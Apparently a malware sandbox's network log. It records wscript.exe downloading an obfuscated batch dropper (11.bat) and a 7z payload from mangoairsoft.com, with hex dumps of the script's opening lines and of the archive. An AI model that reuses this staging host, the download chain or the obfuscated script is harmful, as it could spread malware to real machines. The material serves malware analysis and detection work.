41 6d 64 6d 7a 57 57 66 67 74 77 62 56 69 4b 55 68 4e 62 79 4d 42 6e 4e 48 75 79 62 53 49 4a 43 70 71 7a 42 45 64 58 6c 4e 6a 4f 4a 47 4a 78 64 64 41
                                                          Data Ascii: bdYOgKlXeLXLeaxsQEFvOgBOUKhaxJFAhweRsYmDXDPMHpYwbbNzGqfJguvWZUqvUtDphVJTScPcNFcpEDUxoSsRSXwiasMxubdSBWVfLaoqbthtVYHFJaQpQoBwZOufvYYZJZkEhdKyJBFmClcVssXnBtUDMqauCHUdYCzRzNTZIMeARAdvoWZmqeBcWxrTiYdgmFaVWlQGCAmdmzWWfgtwbViKUhNbyMBnNHuybSIJCpqzBEdXlNjOJGJxddA
                                                          2023-08-02 08:16:18 UTC752INData Raw: 6b 65 54 6f 69 53 56 47 44 66 57 56 4c 67 57 46 75 6c 48 78 77 70 4f 4b 47 63 52 72 5a 4e 57 4e 6d 4f 54 41 6d 63 68 68 4d 4e 56 54 4a 6c 47 4a 4c 44 51 53 66 72 4f 58 50 43 68 58 48 44 6c 79 65 72 45 68 4a 67 79 4b 6c 71 52 73 4a 4a 50 63 6a 79 7a 55 4d 78 62 49 43 72 78 57 58 4b 4a 5a 61 58 6b 51 6b 71 51 7a 57 73 51 45 73 7a 51 6e 4d 6d 46 6a 57 52 68 4a 48 46 62 64 7a 43 51 66 70 66 4d 7a 59 74 52 68 6d 45 6e 48 67 74 51 78 6c 4d 55 5a 49 63 6e 42 46 67 6d 4e 53 54 6a 68 42 61 63 52 4e 5a 79 48 42 48 46 66 72 4b 58 59 65 41 6f 50 65 57 72 77 71 74 4e 53 70 76 63 64 6f 6a 43 6b 65 6e 64 43 6a 67 73 45 6b 4d 55 76 73 76 65 55 6d 73 71 55 77 68 46 57 6c 78 55 6c 66 4c 72 4f 48 79 6a 52 78 63 59 48 6a 6b 42 62 74 66 70 78 4d 5a 63 51 62 59 76 67 41 4b 6c
                                                          Data Ascii: keToiSVGDfWVLgWFulHxwpOKGcRrZNWNmOTAmchhMNVTJlGJLDQSfrOXPChXHDlyerEhJgyKlqRsJJPcjyzUMxbICrxWXKJZaXkQkqQzWsQEszQnMmFjWRhJHFbdzCQfpfMzYtRhmEnHgtQxlMUZIcnBFgmNSTjhBacRNZyHBHFfrKXYeAoPeWrwqtNSpvcdojCkendCjgsEkMUvsveUmsqUwhFWlxUlfLrOHyjRxcYHjkBbtfpxMZcQbYvgAKl
                                                          2023-08-02 08:16:18 UTC768INData Raw: 59 6c 49 61 49 4e 79 4f 51 6b 56 50 79 57 7a 64 77 6a 4e 49 6f 50 48 67 7a 45 51 5a 70 4b 72 69 47 58 4b 77 7a 66 6e 4b 69 62 41 6e 69 70 77 46 69 75 68 73 56 68 71 56 71 4d 68 58 4d 4e 43 67 6e 4f 4c 57 54 52 58 63 72 74 6e 74 75 48 64 4f 78 6b 75 6b 4f 72 79 56 4e 53 6a 61 53 6c 72 46 44 50 59 4b 44 63 6d 65 50 48 71 6e 43 61 58 57 6b 4b 6c 77 4e 6c 44 42 49 58 79 5a 4d 75 68 4b 61 6d 4c 71 6f 4a 72 79 6b 66 76 62 48 52 44 42 6c 4b 6e 48 55 68 4e 42 54 74 57 42 76 47 79 41 46 77 44 6c 53 42 5a 53 6d 6f 47 4f 4d 6f 58 55 4a 5a 4f 43 4f 49 6a 45 47 68 45 53 53 76 4d 4b 48 53 42 6d 50 72 4a 76 49 6a 6c 6b 4b 53 54 79 51 4e 6a 75 56 42 4f 79 53 6f 45 73 57 71 4c 62 75 75 45 6f 4c 4a 53 4a 6e 42 7a 6c 57 64 6d 59 56 76 41 45 71 44 73 72 51 6c 53 71 58 61 57
                                                          Data Ascii: YlIaINyOQkVPyWzdwjNIoPHgzEQZpKriGXKwzfnKibAnipwFiuhsVhqVqMhXMNCgnOLWTRXcrtntuHdOxkukOryVNSjaSlrFDPYKDcmePHqnCaXWkKlwNlDBIXyZMuhKamLqoJrykfvbHRDBlKnHUhNBTtWBvGyAFwDlSBZSmoGOMoXUJZOCOIjEGhESSvMKHSBmPrJvIjlkKSTyQNjuVBOySoEsWqLbuuEoLJSJnBzlWdmYVvAEqDsrQlSqXaW


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.649706188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-08-02 08:16:20 UTC781OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?169173 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                          Host: mangoairsoft.com
                                                          Connection: Keep-Alive
                                                          2023-08-02 08:16:20 UTC781INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 02 Aug 2023 08:16:20 GMT
                                                          Content-Type: application/x-msdos-program
                                                          Content-Length: 1908
                                                          Connection: close
                                                          Last-Modified: Thu, 27 Jul 2023 14:27:09 GMT
                                                          ETag: "774-60178c25fc517"
                                                          Accept-Ranges: bytes
                                                          2023-08-02 08:16:20 UTC781INData Raw: 40 65 63 68 6f 20 6f 66 66 0a 0a 3a 3a 20 52 31 31 66 66 73 52 73 66 73 52 62 0a 3a 3a 20 33 5a 36 66 4b 66 73 52 4b 66 73 52 62 0a 0a 73 65 74 20 22 66 64 61 61 3d 73 65 74 20 22 0a 25 66 64 61 61 25 22 66 64 67 78 76 78 63 76 78 63 3d 43 3a 5c 50 72 6f 67 22 0a 25 66 64 61 61 25 22 68 67 68 67 64 67 64 66 73 7a 3d 72 61 6d 44 22 0a 25 66 64 61 61 25 22 68 79 74 75 72 64 66 67 66 3d 61 74 61 5c 22 0a 0a 3a 3a 20 52 31 31 4b 66 73 66 66 73 52 73 73 52 73 52 73 52 52 62 0a 3a 3a 20 73 73 52 73 52 66 73 52 73 52 52 62 0a 0a 25 66 64 67 78 76 78 63 76 78 63 25 25 68 67 68 67 64 67 64 66 73 7a 25 25 68 79 74 75 72 64 66 67 66 25 0a 0a 73 65 74 20 22 66 67 64 67 68 3d 73 65 74 20 22 0a 25 66 67 64 67 68 25 22 76 62 6e 76 62 76 3d 57 73 63 72 22 0a 25 66 67 64
                                                          Data Ascii: @echo off:: R11ffsRsfsRb:: 3Z6fKfsRKfsRbset "fdaa=set "%fdaa%"fdgxvxcvxc=C:\Prog"%fdaa%"hghgdgdfsz=ramD"%fdaa%"hyturdfgf=ata\":: R11KfsffsRssRsRsRRb:: ssRsRfsRsRRb%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%set "fgdgh=set "%fgdgh%"vbnvbv=Wscr"%fgd


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.649707188.127.230.147443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-08-02 08:16:21 UTC783OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z HTTP/1.1
                                                          Host: mangoairsoft.com
                                                          User-Agent: curl/7.55.1
                                                          Accept: */*
                                                          2023-08-02 08:16:21 UTC783INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 02 Aug 2023 08:16:21 GMT
                                                          Content-Type: application/x-7z-compressed
                                                          Content-Length: 2306944
                                                          Connection: close
                                                          Last-Modified: Thu, 27 Jul 2023 14:02:55 GMT
                                                          ETag: "233380-601786bbd2554"
                                                          Accept-Ranges: bytes
                                                          2023-08-02 08:16:21 UTC784INData Raw: 37 7a bc af 27 1c 00 04 62 94 ad 89 3b 33 23 00 00 00 00 00 25 00 00 00 00 00 00 00 bd 7d 05 34 e0 1b b1 06 4e 5d 00 06 82 cb 94 d3 b9 af f7 1e d4 db db 26 fe 12 c2 40 84 0b ca 5a 74 41 a5 34 05 82 78 3d 69 f9 1a 84 68 af 35 e1 8b 55 42 68 d8 4b a5 de e9 e9 9e 4b 42 7d 22 47 41 bd cc 0e cb d2 0c 2e 18 9d db 78 b3 e6 e2 c7 e7 36 ff 63 8a 38 ec f2 56 ac 3e a9 8a 33 ba 33 a3 7e c2 dd a8 1e 62 8e af 58 c3 d3 08 ed f6 1b 57 d8 62 c6 f4 a1 77 f7 19 db ec 8d 75 62 51 00 a2 a3 68 5b fa b4 16 0d 60 bf cc 33 29 87 ac b4 91 3e cc a8 0a e2 ee 0f b7 55 05 96 4b 13 ec 59 e2 30 7d 28 ee 67 a3 a1 37 e2 84 d2 ab 62 72 77 92 c2 79 d5 ef 15 10 2f 33 7a cb 74 f6 de 9c 0d 2c d2 67 a5 40 f4 ac 92 61 4a c2 9d d1 7f 8e f8 99 30 4b 0c 96 12 aa c4 d2 d1 f2 27 51 d6 ec 06 9e f3 fd
                                                          Data Ascii: 7z'b;3#%}4N]&@ZtA4x=ih5UBhKKB}"GA.x6c8V>33~bXWbwubQh[`3)>UKY0}(g7brwy/3zt,g@aJ0K'Q
                                                          2023-08-02 08:16:21 UTC799INData Raw: 20 a1 58 17 00 5c de 14 66 93 6e 4d e6 0f 0d ec 4e 9a f7 0d d3 c0 ec b2 50 4f 23 af b6 9c e4 9e 86 1f 2c 28 d8 72 1d 14 3a 77 40 be 76 d9 d5 08 0b 27 b4 15 6e 50 48 83 9b ba b5 39 7e 63 9a 91 da 1f 0d c4 59 da 7f 8b 43 02 34 9c f2 5d 1d 01 25 52 70 eb 3e 89 2a f0 2a e3 76 ee 1b 8c 1d 69 06 51 fc 25 bb 7a 34 17 bf 70 91 ba 22 db a5 4a 57 11 7e ab 1d c7 77 12 24 7d 1f 16 26 24 85 04 b5 d9 99 63 85 cc cd 90 34 2c 1f 24 31 0d 13 ef 05 7e 89 2f 8d 70 b9 aa 25 75 51 d5 ab 20 d1 e7 b0 d7 6a 28 f8 ad 0e e2 04 c9 e4 cc 07 bd 51 af 5a 42 18 b1 1f 10 9e ab c3 74 ae 3f d1 a6 80 be 92 8d 39 05 9a 75 7b 10 94 53 44 db 94 7d ad 05 8d 30 07 0f e0 ea e6 d4 52 23 58 6b c3 84 b0 5d 17 56 11 59 83 e3 92 ad d0 26 22 a5 70 60 77 cd 68 de 65 38 13 16 a3 33 ba 26 56 ab 03 f3 cf
                                                          Data Ascii: X\fnMNPO#,(r:w@v'nPH9~cYC4]%Rp>**viQ%z4p"JW~w$}&$c4,$1~/p%uQ j(QZBt?9u{SD}0R#Xk]VY&"p`whe83&V
                                                          2023-08-02 08:16:21 UTC815INData Raw: 38 27 45 be 2c f7 1e 6e 22 d1 5b 21 f0 a4 45 8f c4 f2 bf 48 84 4c 1d e1 d3 79 7a c1 71 5e a8 0c 3c d7 28 2c f8 dd 60 ef 73 15 a8 7f 03 20 a6 e5 39 83 fa 82 0e a9 fd 2e 46 d8 49 ca c9 18 27 60 d6 20 de 75 30 ce 3d c1 7b 16 30 1f 9b cd c6 13 d4 a6 29 f7 70 da 5a 02 ab c8 0e 09 96 79 c0 e8 13 bd e9 72 b0 3f c9 35 35 bc 9d 0a 2a 3b 79 cc aa 6e d6 a2 a9 3c 33 9a 4c 0a 5b 49 3c 74 05 9b ae cf f4 dc 59 86 ba 4a ad a5 25 f6 a7 0f 44 d7 bd b3 74 96 9d be d6 3c 03 23 e3 f5 57 41 ed 7e 70 7c d2 91 59 08 08 3b ef a6 e4 d9 b9 dc fa e5 73 56 12 cd d6 05 3f 90 7b 6f 61 fd 59 8a 79 52 13 78 cd a7 9d 97 50 f6 0b c0 b7 25 ee af b3 bc ae 55 3a 5a 7a 36 c4 a1 0a 47 bf ad 1f f6 6e 8a 7a 31 cd 2f 8d dc b1 81 6f d5 7a 05 26 80 8f 20 46 27 a4 43 cb 71 4b 3b 3f 4a e8 51 67 35 44
                                                          Data Ascii: 8'E,n"[!EHLyzq^<(,`s 9.FI'` u0={0)pZyr?55*;yn<3L[I<tYJ%Dt<#WA~p|Y;sV?{oaYyRxP%U:Zz6Gnz1/oz& F'CqK;?JQg5D
                                                          2023-08-02 08:16:21 UTC831INData Raw: f1 57 ce 65 46 f3 a2 05 d3 1e 75 34 50 05 ee 13 94 27 62 02 89 fd 39 1e d7 ef d0 12 c5 cc 43 30 6d 3a f1 31 33 e4 b5 e0 14 5a 6c fb cd b2 80 73 d1 c1 ea 45 51 ca 18 88 2c 52 4f 2f 3f 3a d6 b6 6e 32 e0 08 94 72 2c be 66 2c ed 90 5d b9 0b 1e 82 86 95 11 fc 15 a7 d4 43 93 71 ba 17 53 28 57 78 6a 6d 5a 5f 97 f9 26 50 b8 e7 8d e2 9b 3a 01 c3 2a b6 f5 88 e0 13 42 86 48 03 39 ac 20 c6 ab 64 85 e5 78 47 47 59 57 2b 5f 64 8e c7 21 d5 73 ec 4f 9f db f9 12 99 cc e5 dc 8b df 1a ba 8b 0d 18 ec eb ff 76 af 6a 25 5d 89 68 0e 1a 6c 55 fb c1 fa 6f d0 9f b2 e0 ba e7 bc dd 94 f6 f4 65 68 25 ed 34 22 7d 37 4c a6 68 08 3e 43 3d b5 69 ac a5 43 d5 4b d6 b3 2a 6b 77 5f 08 11 ba 63 d8 68 da 98 17 b0 45 c2 6b 3e 00 f0 f3 1c 66 97 74 79 e7 2a 03 11 23 bb 99 81 86 b2 8b e5 27 95 2d
                                                          Data Ascii: WeFu4P'b9C0m:13ZlsEQ,RO/?:n2r,f,]CqS(WxjmZ_&P:*BH9 dxGGYW+_d!sOvj%]hlUoeh%4"}7Lh>C=iCK*kw_chEk>fty*#'-
                                                          2023-08-02 08:16:22 UTC847INData Raw: 1d ca 0d d7 81 55 36 0f 11 a0 78 f5 8e f1 b9 74 f8 3a ef 1e b9 69 d9 da ec 8e ea b0 05 30 6a d8 f4 8f 04 61 93 9d 9f 58 55 56 b5 58 0e 4e ae e6 e5 e2 9b 6d e6 7a 78 cc 53 93 28 3f 34 a9 23 4c 29 b3 7a e1 5a c8 91 a2 ba f5 9f e4 0c 42 da ce 17 24 a7 fb a5 58 64 88 04 d0 44 6a 93 f3 c1 af e6 8d d8 87 f0 b8 85 fc a9 a6 f5 a6 ad bf 07 c1 b4 c5 c8 ed eb 26 82 b3 3c dd 10 eb 61 87 4e 2d bf 08 bf 66 28 be 12 de 14 1f 2f ab 2e a1 a8 b2 5f da 9c 41 c9 6f 6b 4c 7a 04 21 7f 82 6e e8 8e 7b 46 bc 15 e7 bd 37 b8 a7 6b c8 0a 8e a4 6f 28 99 01 7d 1d 22 b6 a5 dd e0 05 96 0b 09 c2 27 96 09 15 48 ec 80 4b d6 d7 9f 49 02 1a 08 d3 6d 93 25 c1 79 15 fc 2b c9 c9 9b a5 01 f3 e8 f9 0b 80 26 9f 07 0b 4e d1 7c 65 d1 d7 5f ae 3f a7 7c 30 91 ce c1 e8 b6 d9 6b 9c c4 29 36 be 4f ba 0b
                                                          Data Ascii: U6xt:i0jaXUVXNmzxS(?4#L)zZB$XdDj&<aN-f(/._AokLz!n{F7ko(}"'HKIm%y+&N|e_?|0k)6O
                                                          2023-08-02 08:16:22 UTC863INData Raw: bf 83 7f e1 a3 bc 15 5a 32 72 cd 06 d5 3b 9d 67 43 4d 24 e8 0e ea 69 ad bd f5 09 fd 0f 29 6d cd 0c 63 c8 05 e0 79 71 c5 59 d1 e6 68 c5 14 96 cb b6 a9 17 0b ef 44 1c 50 57 fe c1 a5 d3 fc d9 d6 b8 5d 39 c5 5f 0f a6 ef 5b c0 d7 36 76 9f ac 06 e9 b4 ac 98 ba 2a 38 8e d1 14 22 94 fc 9e 55 1c 12 b9 33 0b 6c 0b 8a 9a f0 21 b0 98 da 02 1e 87 5b 6f b0 ff 43 d2 c5 f0 6e 16 14 2e ed 15 9c 4e d1 ce 19 f4 b4 e7 d3 b7 b3 7f 78 8d a6 1c c2 a1 27 7e d3 15 ea 1f a2 97 89 47 7f 60 3c 4e 99 d2 bf 5e e4 8f 40 20 a1 e7 07 b4 92 02 66 ca 03 94 5d d8 29 e2 af c2 b3 f5 58 9b 32 c1 fe 0e e1 7d e8 93 e2 f7 ac 52 77 39 db a8 e4 73 9a 31 f9 cd 31 1d 7a 14 9f 20 4e 76 cb a9 2d b1 d1 66 b9 a7 ab 7e 57 e4 aa c8 c4 d4 66 34 8d 42 9d 51 c9 12 3c d5 ad 00 c1 6b 77 22 dc 77 20 22 f5 4d 57
                                                          Data Ascii: Z2r;gCM$i)mcyqYhDPW]9_[6v*8"U3l![oCn.Nx'~G`<N^@ f])X2}Rw9s11z Nv-f~Wf4BQ<kw"w "MW
                                                          2023-08-02 08:16:22 UTC879INData Raw: 7f 7e 8e 38 2a e7 74 1b 62 ea c6 d4 7e 8d 8b 71 b9 85 58 30 83 69 5b 12 1d 4d 22 f2 39 b6 80 8c 23 3f 09 f4 45 88 f4 05 c6 18 6e dd 99 2e 0c 7a 0e d2 27 f5 2a 56 90 a8 58 99 29 58 ea fd b7 70 a1 c0 a0 d6 a9 de ce 40 a3 77 50 d5 e6 71 44 4f 43 c4 90 49 41 93 01 ed 2a af f7 08 c4 dc 07 db eb 6f 88 a1 e7 33 15 cf 62 07 a1 42 05 26 08 35 ef 95 f8 56 5d d5 6e f3 ca b1 c0 86 bd 43 4b eb 3e e6 46 44 4c 27 18 ba 4e cc d1 c2 07 c4 ec 69 87 9a c7 12 bd 71 9e 19 cd 51 df d7 a6 e2 b7 2d f2 12 5d cf 70 5b 22 99 48 d2 3b 60 1f 89 c5 0d ad 52 28 70 1a d0 81 2c b1 e7 6f 1b 33 70 22 98 bc 22 d9 75 93 f3 f0 94 ee 57 56 79 3a 52 57 2c 1b f7 2a 08 b3 7e d8 6d 2e 9e 53 79 f5 00 57 e1 4a b4 f1 9a 81 22 a2 6b dc 2a 69 dd 3d d9 d9 c9 3c 73 d0 8b 1c d5 1d 71 dd 0d c4 8d cd 21 f9
                                                          Data Ascii: ~8*tb~qX0i[M"9#?En.z'*VX)Xp@wPqDOCIA*o3bB&5V]nCK>FDL'NiqQ-]p["H;`R(p,o3p""uWVy:RW,*~m.SyWJ"k*i=<sq!
                                                          2023-08-02 08:16:22 UTC895INData Raw: 2c 80 a3 55 08 82 d6 cf 94 59 0e 12 21 ea bd 66 f8 b6 f9 a3 c8 9d 44 56 73 93 de cf fe 6a 50 a0 d2 3f 61 97 69 79 8f dd 4f 89 1d b9 6f 39 e2 e5 26 7d e3 e1 6d 56 13 fe 72 61 dd 36 76 0f 27 7c 48 2f a1 06 5f b4 33 87 c3 6b 65 83 17 d8 a3 dc db 30 29 8b 74 45 32 60 fd 3f 79 50 1e 36 77 40 fc 8d fe 20 0d 60 94 73 8c ec 17 07 14 57 fc 17 21 80 bf be 8e c7 22 af 6e 0e 56 81 71 04 f4 c2 4f 9b 60 85 4a 9f f2 29 e0 86 db b3 f1 cc 04 f4 53 dd 94 df cb da bb 8f f9 5c ce f5 f4 9a e8 60 6e 39 8b 89 b9 99 3e 70 d5 50 07 fc 78 a7 88 8e df 3f f0 a9 10 a8 c1 b6 9b d4 4d 8b 5a f3 7e 7c 1e 14 f5 0d 5c f8 d0 41 be 0b 07 f2 a9 63 ec 24 7b 9f a4 d6 3e 13 c3 28 52 b7 08 ab 98 f2 af 3b 0c f0 16 66 a1 f7 a2 66 3a d3 40 b3 4c a2 09 13 38 69 d6 60 9c df 79 71 b4 01 47 d5 5f c7 83
                                                          Data Ascii: ,UY!fDVsjP?aiyOo9&}mVra6v'|H/_3ke0)tE2`?yP6w@ `sW!"nVqO`J)S\`n9>pPx?MZ~|\Ac${>(R;ff:@L8i`yqG_
                                                          2023-08-02 08:16:22 UTC911INData Raw: 1c 1b 35 5f 31 b1 08 e7 a3 a1 9a ee ae 53 42 f1 63 d7 15 c4 71 57 52 19 fb f2 f6 65 dd bb 37 d7 68 26 a1 7d 54 6d e0 86 58 08 18 23 85 83 36 e9 c1 4b 54 29 2f b2 1b 06 90 db 09 4f c4 69 c2 e3 81 2d aa 8b e0 75 93 cc 7e 5c f2 e8 60 92 66 e2 93 90 00 fb 6d 93 cf a7 68 12 84 55 07 e3 8b 48 e9 b2 57 d4 11 d0 78 c4 b4 3a c9 3a 96 9d 04 b9 48 3f 96 53 97 7d 17 10 f0 02 86 b7 c6 54 63 55 19 70 8c ad 00 b0 0d fa 99 06 e7 0a 7b c7 da 9b 3c 06 56 7a 66 d9 9e c0 9a ac 53 99 4d 7a df b6 f7 83 2f 8d d4 f2 6e c1 97 76 fc 48 6c e8 d7 03 e8 76 44 3e b4 89 05 d1 53 11 4e 48 56 c9 90 77 36 80 7b 60 22 bb 57 40 f1 26 ee 58 69 45 52 56 af 07 4a 6d a9 20 ef 7d 5c 80 ea 8a 3e d7 ae 8a 06 10 ca ca 7b 84 3d 11 d9 0c 3a d9 d7 55 16 8a 78 4b 38 a1 4a b8 82 01 07 9e a5 4a dc 05 e3
                                                          Data Ascii: 5_1SBcqWRe7h&}TmX#6KT)/Oi-u~\`fmhUHWx::H?S}TcUp{<VzfSMz/nvHlvD>SNHVw6{`"W@&XiERVJm }\>{=:UxK8JJ
                                                          2023-08-02 08:16:22 UTC927INData Raw: 7d db a1 98 8b 0b 32 2a 7c 4d 92 75 97 9d e5 fc 13 17 34 7d b3 4a ec c9 6e ab a0 c3 31 a2 aa 17 69 f7 4f a9 ec 5c e6 10 11 cf af a1 3c 10 9a f6 7c cc 29 dc 18 04 7a bc a9 14 8d 67 3b 22 ff 94 fd f8 c1 6a ae 8e c4 3b bd 42 ba 97 4f f3 10 34 5e ce 1d ee ac 29 b2 e3 f3 b7 5f df 35 48 03 63 7b 91 1e a6 dd 5e 42 58 e9 f4 36 05 5a ae c5 6f f5 cc 11 ef 31 d4 d1 6e e1 3f 81 eb e5 b2 48 9f 15 fb 02 90 f7 73 96 5c 38 8c 91 b5 de 6a 88 51 87 e2 fe 27 8f b4 50 9d d9 5d 8a 54 5b bb 39 f0 49 a8 4c d6 a2 aa 23 1e e6 70 fe 64 8a 95 c1 a8 e2 d0 92 f9 1f 1f b0 c9 9c b4 74 68 b8 8d 23 6d e8 f8 f8 f3 3e 74 48 d7 e3 a2 f5 60 60 a5 7b bc 1b 59 9f 33 9e ef 05 73 a8 f2 3b d6 85 37 89 3c ee 88 d3 41 b1 23 de f4 02 dd 22 0e 29 3e 01 9e 08 b1 8a b2 da 68 6b 5d 3d 0f 5f a0 ea 4d ee
                                                          Data Ascii: }2*|Mu4}Jn1iO\<|)zg;"j;BO4^)_5Hc{^BX6Zo1n?Hs\8jQ'P]T[9IL#pdth#m>tH``{Y3s;7<A#")>hk]=_M
                                                          2023-08-02 08:16:22 UTC943INData Raw: 8c 17 75 39 7d 85 5e e0 8d 48 4e 9f 46 a1 35 82 c6 49 18 09 3f f4 6d 3a 03 a2 be 60 4c 59 41 2e dd 59 70 75 ab d5 ca 4c 16 a9 88 17 54 b6 05 b7 88 b8 26 77 01 b9 4e 71 25 e9 3d 34 bb 69 3e 40 e1 8f d4 a3 88 d1 54 0b 12 ec 27 39 f6 a4 57 a2 f3 b3 5b 86 e7 89 87 26 0c fd d0 e0 00 4a 42 47 26 84 ca 0f 26 c0 48 eb f4 c0 f1 c2 5f 9e a0 a9 91 0c d0 3d b2 bd 97 54 cf f9 2d 7f 39 b3 be d5 90 fe d6 5f ad 58 30 8d 1d 2b 25 2a 08 ae 57 f0 7d a3 a3 c4 cf b4 c6 4e b3 dd 14 a3 dc ce 7e da ad 75 20 d6 01 70 b6 25 df 0e eb c2 c4 92 f0 12 02 10 38 12 c1 86 df 1d 20 c8 a1 07 5f e5 c7 e0 c2 62 d1 2b ef 0e f4 e6 20 26 b7 ad c1 5e 68 08 46 44 9c f4 fd 97 cc f5 5d b8 4a 00 39 56 4f d2 46 60 54 7f 3f 9f e9 23 90 b8 ad b7 3c 8e 82 4c 4e ce 3e 7d dc 9b f7 1f 4e b8 e1 94 0d 36 24
                                                          Data Ascii: u9}^HNF5I?m:`LYA.YpuLT&wNq%=4i>@T'9W[&JBG&&H_=T-9_X0+%*W}N~u p%8 _b+ &^hFD]J9VOF`T?#<LN>}N6$
                                                          2023-08-02 08:16:22 UTC959INData Raw: c6 30 7f 56 6f 91 54 9b 0f c1 50 8a 90 5d b4 4c 73 64 bb 05 6b cf bf 16 e1 92 c9 47 b0 d0 0e 87 f1 f6 b1 24 bc 3e 08 91 9b 4b 6c 6a 9a 23 5d 85 fc ca 7d cd dc 1f 65 17 e9 41 d0 81 90 5f fd 41 ed bd 6c 85 6e e7 ab ea ba 1c 46 a3 c9 06 8e ea 16 68 94 b2 7e 27 ef fb a8 3b eb e5 81 35 75 bf 9c f4 43 f6 ca d8 87 27 fd c6 6b 4f b2 3f 93 cf d0 6a 59 d3 f2 d5 3d fc 2e 08 e3 68 72 ee 3d 72 ef e6 30 e4 66 e5 f7 89 bf 3a 20 93 48 18 80 6e 07 df df a0 71 0b ca 43 8b 49 bd 42 40 83 46 d2 71 1c dd 29 2b 3c 1a db d7 77 31 10 73 8e 2c a0 98 98 ab 95 46 5f de 40 8b c7 63 51 5d 80 2a 0d 93 16 d9 e0 38 47 f3 6f 46 51 02 e5 33 8c 09 52 f6 de 84 c7 11 7d 20 22 16 11 57 46 87 75 44 ec 12 0a e9 30 06 7b 8c 2e b4 d1 10 bd 2e 7f 78 79 27 e4 cd c1 6a 9d 74 0d 9f 6b 4e e2 6d 79 c2
                                                          Data Ascii: 0VoTP]LsdkG$>Klj#]}eA_AlnFh~';5uC'kO?jY=.hr=r0f: HnqCIB@Fq)+<w1s,F_@cQ]*8GoFQ3R} "WFuD0{..xy'jtkNmy
                                                          2023-08-02 08:16:22 UTC975INData Raw: 6d cd fe f3 ab 5a ad 11 a6 2a 1e ce 5a 23 33 aa d5 a9 ca 9a 32 d3 15 a2 5b d3 20 27 99 11 da 1b 79 a2 74 12 3d 92 9a e3 39 af e9 e6 49 a8 d0 94 8c 1f 36 52 f1 9c c1 17 da ba 20 55 d6 99 19 77 b4 0c 26 ce 09 37 73 4f 78 56 82 65 51 d8 9b 65 5d 45 e5 d7 db 6a 16 76 b5 99 04 f7 a3 a7 77 8e dd 37 e7 68 f9 db 9c f3 34 64 c0 ca c4 05 71 9e e2 f7 8f 06 f6 e5 ba f5 4e 61 bc 09 5b 46 cd bf 4a 1d a2 72 ee 5f a5 3f b8 5c 9b f8 95 c4 e3 ed 26 4e 56 a8 ed 5c 1e da c8 35 3d cb a3 6d ce fa 8a 69 11 36 55 12 34 11 95 29 cf 18 2f 17 1b f9 95 13 f6 05 19 b5 5d fb 89 91 11 45 24 5e a7 a7 3d ce da f4 ba 04 2d 09 87 08 5d 5c 7d a4 24 1a 31 6f c2 80 3b b9 93 66 04 48 a3 9b 40 63 88 36 04 f8 95 48 14 c5 3f 2e 1f 50 11 be d8 1a d6 34 9a 33 03 1a ae be 41 9d e1 40 32 46 62 7c cd
                                                          Data Ascii: mZ*Z#32[ 'yt=9I6R Uw&7sOxVeQe]Ejvw7h4dqNa[FJr_?\&NV\5=mi6U4)/]E$^=-]\}$1o;fH@c6H?.P43A@2Fb|
                                                          2023-08-02 08:16:22 UTC991INData Raw: 25 76 4f 5a e8 f5 f3 3e 6a c2 01 1c 5c 6a 86 f9 be ee 51 bf 45 18 56 ad b5 88 8c 3b e5 17 53 ef b8 a3 1a be cf 11 6f db a7 88 92 9b 5f 7d ac 76 2f ba 33 bb 7f 09 0c 43 00 e3 66 0b 38 3e e4 ed 19 dc e2 ea b1 da f6 a0 91 e5 05 6d 34 4b 5f 4c 8e df 07 d2 a6 b9 ef 72 eb b4 3f cd 01 77 1b fe 7b c8 5a a4 65 c5 82 3d 3d 59 80 6b 7f 11 92 36 d1 fe 75 b5 40 97 8c fe 1d 01 02 32 19 95 0d 89 b5 4b ba bf 5c 76 bd 42 b0 70 ce c9 9f c2 c1 88 03 8a d9 35 66 ca 3f f2 cf 35 33 1e 50 7f 5d f1 8b fb e7 b7 f8 48 51 28 2b 34 6b b4 ad ff 1b ae d3 70 89 0f 05 0f f6 5c a3 97 18 d4 d6 de 73 8b 87 de be ed b8 9e 97 f8 79 38 e8 0a 95 e5 41 8b 60 fd f3 34 9f 36 d9 c1 81 1a 88 13 8b 56 c1 8b b7 75 50 e9 43 9f 73 49 28 50 04 0a 5f 1d 37 bf 6e fe b8 6e 41 47 73 4d fb 5d 32 38 bf c1 9c
                                                          Data Ascii: %vOZ>j\jQEV;So_}v/3Cf8>m4K_Lr?w{Ze==Yk6u@2K\vBp5f?53P]HQ(+4kp\sy8A`46VuPCsI(P_7nnAGsM]28
